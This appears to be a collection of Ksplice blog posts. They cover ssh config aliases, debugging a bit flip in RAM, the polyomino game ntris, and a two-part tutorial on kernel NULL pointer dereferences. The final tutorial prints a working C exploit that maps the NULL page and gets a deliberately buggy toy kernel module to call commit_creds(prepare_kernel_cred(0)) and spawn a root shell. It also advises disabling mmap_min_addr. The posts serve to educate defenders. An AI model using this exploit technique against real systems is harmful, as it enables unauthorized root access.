wdaher@rocksteady:~$ ssh -p 2222
wdaher@rocksteady:~$ ssh -p 8183
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    Port 2222
    User wdaher

Host alice
    Port 8183
    User waseem

Host self
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self
And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.
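
The file format is simple enough that scripts can read it too. Here is a deliberately minimal sketch that handles only what appears above: Host lines followed by indented "Keyword value" pairs. It ignores wildcard patterns, several names on one Host line, and the "Keyword=value" spelling, and parse_ssh_config is a hypothetical name.

```python
def parse_ssh_config(text):
    """Parse 'Host' blocks with simple 'Keyword value' lines into a dict."""
    hosts = {}
    current = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue                        # skip blanks and comments
        parts = line.split(None, 1)
        keyword = parts[0].lower()          # keywords are case-insensitive
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "host":
            current = hosts.setdefault(value, {})
        elif current is not None:
            current[keyword] = value
    return hosts


SAMPLE_CONFIG = """\
Host bob
    Port 2222
    User wdaher

Host alice
    Port 8183
    User waseem
"""

config = parse_ssh_config(SAMPLE_CONFIG)
```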

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!


Thursday Jun 24, 2010

Attack of the Cosmic Rays!

It's a well-documented fact that RAM in modern computers is susceptible to occasional random bit flips due to various sources of noise, most commonly high-energy cosmic rays. By some estimates, you can even expect error rates as high as one error per 4GB of RAM per day! Many servers these days have ECC RAM, which uses extra bits to store error-correcting codes that let them correct most bit errors, but ECC RAM is still fairly rare in desktops, and unheard-of in laptops.

For me, bitflips due to cosmic rays are one of those problems I always assumed happen to "other people". I also assumed that even if I saw random cosmic-ray bitflips, my computer would probably just crash, and I'd never really be able to tell the difference from some random kernel bug.

A few weeks ago, though, I encountered some bizarre behavior on my desktop that honestly just didn't make sense. I spent about half an hour digging to discover what had gone wrong, and eventually determined, conclusively, that my problem was a single undetected flipped bit in RAM. I can't prove whether the problem was due to cosmic rays, bad RAM, or something else, but in any case, I hope you find this story interesting and informative.

The problem

The symptom that I observed was that the expr program, used by shell scripts to do basic arithmetic, had started consistently segfaulting. This first manifested when trying to build a software project, since the GNU autotools make heavy use of this program:

[nelhage@psychotique]$ autoreconf -fvi
autoreconf: Entering directory `.'
autoreconf: not using Gettext
autoreconf: running: aclocal --force -I m4
autoreconf: tracing
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault

dmesg revealed that the segfaulting program was expr:

psychotique kernel: [105127.372705] expr[7756]: segfault at 1a70 ip 0000000000001a70 sp 00007fff2ee0cc40 error 4 in expr
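
That one line of dmesg output carries more information than it first appears to. As a rough sketch, the following Python pulls the fields apart and decodes the low three bits of the x86 page-fault error code (page present, write access, user mode). The function name and dictionary keys are my own, and the regular expression assumes the message layout shown above.

```python
import re

# Groups: program, pid, fault address, instruction pointer, stack pointer, error.
SEGFAULT = re.compile(
    r"(\S+)\[(\d+)\]: segfault at ([0-9a-f]+) "
    r"ip ([0-9a-f]+) sp ([0-9a-f]+) error ([0-9a-f]+)"
)


def parse_segfault(line):
    """Split a kernel segfault message into fields; return None if it doesn't match."""
    match = SEGFAULT.search(line)
    if match is None:
        return None
    program, pid, addr, ip, sp, error = match.groups()
    code = int(error, 16)               # the kernel prints the code in hex
    return {
        "program": program,
        "pid": int(pid),
        "fault_address": int(addr, 16),
        "instruction_pointer": int(ip, 16),
        "stack_pointer": int(sp, 16),
        # Low bits of the x86 page-fault error code.
        "page_was_present": bool(code & 1),
        "was_write": bool(code & 2),
        "from_user_mode": bool(code & 4),
    }


LINE = ("psychotique kernel: [105127.372705] expr[7756]: segfault at 1a70 "
        "ip 0000000000001a70 sp 00007fff2ee0cc40 error 4 in expr")
info = parse_segfault(LINE)
```

For this message, error 4 decodes to a user-mode read of a page that wasn't mapped. The faulting address is also equal to the instruction pointer, which suggests the program tried to execute code at 0x1a70 rather than merely read data from it.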

And I was easily able to reproduce the problem by hand:

[nelhage@psychotique]$ expr 3 + 3
Segmentation fault

expr definitely hadn't been segfaulting as of a day ago or so, so something had clearly gone suddenly, and strangely, wrong. I had no idea what, but I decided to find out.

Check the dumb things

I run Ubuntu, so the first things I checked were the /var/log/dpkg.log and /var/log/aptitude.log files, to determine whether any suspicious packages had been upgraded recently. Perhaps Ubuntu accidentally let a buggy package slip into the release. I didn't recall doing any significant upgrades, but maybe dependencies had pulled in an upgrade I had missed.

The logs revealed I hadn't upgraded anything of note in the last several days, so that theory was out.

Next up, I checked env | grep ^LD. The dynamic linker takes input from a number of environment variables, all of whose names start with LD_. Was it possible I had somehow ended up setting some variable that was messing up the dynamic linker, causing it to link a broken library or something?

[nelhage@psychotique]$ env | grep ^LD

That, too, turned up nothing.

Start digging

I was fortunate in that, although this failure was strange and sudden, it seemed perfectly reproducible, which meant I had the luxury of being able to run as many tests as I wanted to debug it.

The problem was a segfault, so I decided to pull up a debugger and figure out where it was segfaulting. First, though, I wanted debug symbols, so I could make heads or tails of the crashed program. Fortunately, Ubuntu provides debug symbols for every package they ship, in a separate repository. I already had the debug sources enabled, so I used dpkg -S to determine that expr belongs to the coreutils package:

[nelhage@psychotique]$ dpkg -S $(which expr)
coreutils: /usr/bin/expr

And installed the coreutils debug symbols:

[nelhage@psychotique]$ sudo aptitude install coreutils-dbgsym

Now, I could run expr inside gdb, catch the segfault, and get a stack trace:

[nelhage@psychotique]$ gdb --args expr 3 + 3
(gdb) run
Starting program: /usr/bin/expr 3 + 3
Program received signal SIGSEGV, Segmentation fault.
0x0000000000001a70 in ?? ()
(gdb) bt
#0  0x0000000000001a70 in ?? ()
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
#2  0x00000000004027dd in eval4 (evaluate=true) at expr.c:773
#3  0x000000000040291d in eval3 (evaluate=true) at expr.c:812
#4  0x000000000040208d in eval2 (evaluate=true) at expr.c:842
#5  0x0000000000402280 in eval1 (evaluate=<value optimized out>) at expr.c:921
#6  0x0000000000402320 in eval (evaluate=<value optimized out>) at expr.c:952
#7  0x0000000000402da5 in main (argc=2, argv=0x0) at expr.c:329

So, for some reason, the eval5 function has jumped off into an invalid memory address, which of course causes a segfault. Repeating the test a few times confirmed that the crash was totally deterministic, with the same stack trace each time. But what is eval5 trying to do that's causing it to jump off into nowhere? Let's grab the source and find out:

[nelhage@psychotique]$ apt-get source coreutils
[nelhage@psychotique]$ cd coreutils-7.4/src/
[nelhage@psychotique]$ gdb --args expr 3 + 3
# Run gdb, wait for the segfault
(gdb) up
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
745           if (nextarg (":"))
(gdb) l
740       trace ("eval5");
741     #endif
742       l = eval6 (evaluate);
743       while (1)
744         {
745           if (nextarg (":"))
746             {
747               r = eval6 (evaluate);
748               if (evaluate)
749                 {

I used the apt-get source command to download the source package from Ubuntu, and ran gdb in the source directory, so it could find the files referred to by the debug symbols. I then used the up command in gdb to go up a stack frame, to the frame where eval5 called off into nowhere.

From the source, we see that eval5 is trying to call the nextarg function. `gdb` will happily tell us where that function is supposed to be located:

(gdb) p nextarg
$1 = {_Bool (const char *)} 0x401a70 <nextarg>

Comparing that address with the address in the stack trace above, we see that they differ by a single bit. So it appears that somewhere a single bit has been flipped, causing that call to go off into nowhere.

But why?

So there's a flipped bit. But why, and how did it happen? First off, let's determine where the problem is. Is it in the expr binary itself, or is something more subtle going on?

[nelhage@psychotique]$ debsums coreutils | grep FAILED
/usr/bin/expr                                                             FAILED

The debsums program will compare checksums of files on disk with a manifest contained in the Debian package they came from. In this case, examining the coreutils package, we see that the expr binary has in fact been modified since it was installed. We can verify how it's different by downloading a new version of the package, and comparing the files:

[nelhage@psychotique]$ aptitude download coreutils
[nelhage@psychotique]$ mkdir coreutils
[nelhage@psychotique]$ dpkg -x coreutils_7.4-2ubuntu1_amd64.deb coreutils
[nelhage@psychotique]$ cmp -bl coreutils/usr/bin/expr /usr/bin/expr
 10113 377 M-^? 277 M-?

aptitude download downloads a .deb package, instead of actually doing the installation. I used dpkg -x to just extract the contents of the file, and cmp to compare the packaged expr with the installed one. -b tells cmp to print the bytes that differ, and -l tells it to list all differences, not just the first one. So we can see that exactly one byte differs (octal 377 in the packaged binary versus 277 in the installed one), and by a single bit, which agrees with the failure we saw. So somehow the installed expr binary is corrupted.

So how did that happen? We can check the mtime ("modified time") field on the program to determine when the file on disk was modified (assuming, for the moment, that whatever modified it didn't fix up the mtime, which seems unlikely):

[nelhage@psychotique]$ ls -l /usr/bin/expr
-rwxr-xr-x 1 root root 111K 2009-10-06 07:06 /usr/bin/expr*

Curious. The mtime on the binary is from last year, presumably whenever it was built by Ubuntu, and set by the package manager when it installed the system. So unless something really fishy is going on, the binary on disk hasn't been touched.

Memory is a tricky thing.

But hold on. I have 12GB of RAM on my desktop, most of which, at any moment, is being used by the operating system to cache the contents of files on disk. expr is a pretty small program, and frequently used, so there's a good chance it will be entirely in cache, and my OS has basically never touched the disk to load it, since it first did so, probably when I booted my computer. So it's likely that this corruption is entirely in memory. But how can we test that? Simple: by forcing the OS to discard the cached version and re-read it from disk.

On Linux, we can do this by writing to the /proc/sys/vm/drop_caches file, as root. We'll take a checksum of the binary first, drop the caches, and compare the checksum after forcing it to be re-read:

[nelhage@psychotique]$ sha256sum /usr/bin/expr
4b86435899caef4830aaae2bbf713b8dbf7a21466067690a796fa05c363e6089  /usr/bin/expr
[nelhage@psychotique]$ echo 3 | sudo tee /proc/sys/vm/drop_caches
[nelhage@psychotique]$ sha256sum /usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  /usr/bin/expr
[nelhage@psychotique]$ sha256sum coreutils/usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  coreutils/usr/bin/expr

And behold, the file changed. The corruption was entirely in memory. And, furthermore, expr no longer segfaults, and matches the version I downloaded earlier.

(The sudo tee idiom is a common one I use to write to a file as root from a normal user shell. sudo echo 3 > /proc/sys/vm/drop_caches of course won't work because the file is still opened for writing by my shell, which doesn't have the required permissions.)


As I mentioned earlier, I can't prove this was due to a cosmic ray, or even a hardware error. It could have been some OS bug in my kernel that accidentally did a wild write into my memory in a way that only flipped a single bit. But that'd be a pretty weird bug.

And in fact, since that incident, I've had several other, similar problems. I haven't gotten around to memtesting my machine, but that does suggest I might just have a bad RAM chip on my hands. But even with bad RAM, I'd guess that flipped bits come from noise somewhere -- they're just susceptible to lower levels of noise. So it could just mean I'm more susceptible to the low-energy cosmic rays that are always falling. Regardless of whatever the cause was, though, I hope this post inspires you to think about the dangers of your RAM corrupting your work, and that the tale of my debugging helps you learn some new tools that you might find useful some day.

Now that I've written this post, I'm going to go memtest my machine and check prices on ECC RAM. In the meanwhile, leave your stories in the comments -- have you ever tracked a problem down to memory corruption? What are your practices for coping with the risk of these problems?


Edited to add a note that this could well just be bad RAM, in addition to a one-off cosmic-ray event.

Wednesday Jun 16, 2010

ntris: an idea taken a step too far

About nine months ago, I lost a lot of free time to a little applet called Pentris. The addition of pentomino pieces made the gameplay quite different from the original falling block game, but I couldn't help but think that Pentris didn't go far enough. As a programmer, I had to implement the natural generalization of the game. After a much longer development cycle than I had originally anticipated, ntris is now ready. (You'll need Java to run the applet.)

In ntris, as your score increases, so does the probability that you will get increasingly large polyominoes. At the beginning, you'll only get pieces made of 1-5 squares. By the time your score gets to 100, about one piece in three will be a hexomino - and that's still just the beginning. Very few of my beta-testers have survived long enough to see a decomino. The current high is 421, by wuthefwasthat - can you beat it?

Here are a few of my most feared pieces.

You don't want to see these in your queue.

Everyone who plays ntris is familiar with these pieces. From left to right: the mine, whose rotational symmetry and hot pink color make a deadly combination; the jerk, and its close relative, the donut, which are the smallest pieces with non-trivial homotopy; and the dog, one of the pieces I call "animals", for obvious reasons.

I've also implemented a multiplayer mode in which you can face off against another player. In play-testing, I found that a large polyomino was a much more intimidating attack than the usual garbage, so clearing lines sends larger pieces to your opponents. I think multiplayer ntris offers something no other game does: the satisfaction of making your opponent play a monstrous nonomino. They're not clearing lines anytime soon.

Dealing with a massive piece.

When you just start out playing ntris, there are a few things you should remember.

  • Don't be too greedy. Creating a deep empty column is a sure way to lose.
  • Pay attention to your queue. Plan ahead when you see a large piece coming.
  • You can hold a bad piece if you can't place it, but don't keep it there too long.
  • Use singletons to fix your board. Maneuver them into holes and bad spots.

I should also tell you about a more advanced ntris technique, "laying it across", which is a key element of higher-level play.

Lay it across

What makes ntris different from Tetris, Blockles, and Pentris? Some simple math reveals a major gameplay difference between ntris and the other games. Let's look at Tetris first. The playing field is 10 columns wide, and each piece takes up four squares. That means that, asymptotically, you have to clear 4/10 of a line with each drop. Suppose that you use a standard open column strategy and only clear lines with 4-longs. Each one clears 4 lines, and there are 6 other tetrominoes, so you clear, on average, 4/7 of a line per piece. That is more than the required 4/10, and so enough to stay alive.

At the start of ntris, you could get any of the 29 pieces made of 1-5 squares. These pieces have, on average, 4.38 squares per piece. The board is 12 columns wide, so you have to clear 4.38/12 = 0.365 lines per drop. If you use only straight pieces to clear lines, you clear on average 15 lines every 29 pieces, or 0.517 lines per piece. But clearing multiple lines at a time yields large score bonuses, so if you're greedy, you'll only clear lines when you get a 4-long or a 5-long. Naively, this means that you only clear 9 lines every 29 pieces - 0.310 lines per piece - so you are bound to lose.

The solution is skimming, or clearing lines with the horizontal parts of your pieces. By skimming, you can clear four lines with the long-L-block and the long-J-block, as well as with the 4-long.

Skimming a long-L-block.

Similarly, when you start getting hexominoes, you can clear five lines with more than just the 5-long. If you do the math, you'll see that with a score over 100, you must use some form of skimming just to clear lines fast enough to survive. When you start to get even larger blocks, you'll have to take skimming to an extreme to deal with them. Here's a good example of how you "lay it across":

a) A nasty piece. b) Lay it across. c) Play more pieces on the same line. d) The play resolves.

To lay a piece across, play the piece such that most of it falls on a single horizontal line. Clear that line with the next few pieces. Laying it across can be counter-intuitive, since it often creates several holes in your board, but it is often the only viable way to play a piece. A word of caution: before laying a piece across, you should always think ahead a few moves, to be sure that the play will resolve quickly. Otherwise, you run the risk of covering part of your board with the piece that wouldn't go away.

Your move

I'm only an average ntris player, and we have just scratched the surface of ntris strategy. Many of you will be much better than me at this game. The server is always running, and I promise this game isn't as hard as it might seem. Can you get the high score in ntris?

Please note: ntris is my personal project and is not affiliated with or endorsed by Ksplice or the makers of Tetris. Please see for more information about Tetris.


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you to play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer dereference, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there is a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a program wants to write to a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the arguments, does the write, and returns to the calling program.

This all has at least two important consequences for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

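#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
  /* Map one page at address 0, so a read through NULL finds valid memory */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}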
Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses.)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_creds will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

struct cred;
struct task_struct;

/* 32-bit x86 kernels pass arguments in registers, hence regparm(3) */
typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
  __attribute__((regparm(3)));
typedef int (*commit_creds_t)(struct cred *new)
  __attribute__((regparm(3)));

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;

    if (!f)
        return NULL;
    while(fscanf(f, "%p %c %511s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name)) {
            fclose(f);
            return addr;
        }
    fclose(f);
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
    commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
      return 1;
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit of attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  /* Cast the pointer to an integer type so it can be printed as a plain number */
  printf("The argv pointer = %lu\n", (unsigned long)argv);
  return 0;
}
Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means is that every program running on your computer has its own namespace for pointers (from 0 to 2^32-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.


One feature of this setup is that while each process has its own 2^32 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

addr: This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length: The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
prot: Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags: Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd: The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going to pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
offset: This argument would be used with fd to indicate which portion of a file we wanted to map.

mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  /* Map one page at address 0; MAP_FIXED insists on exactly that address */
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
           MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  }
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;
}

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!



Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

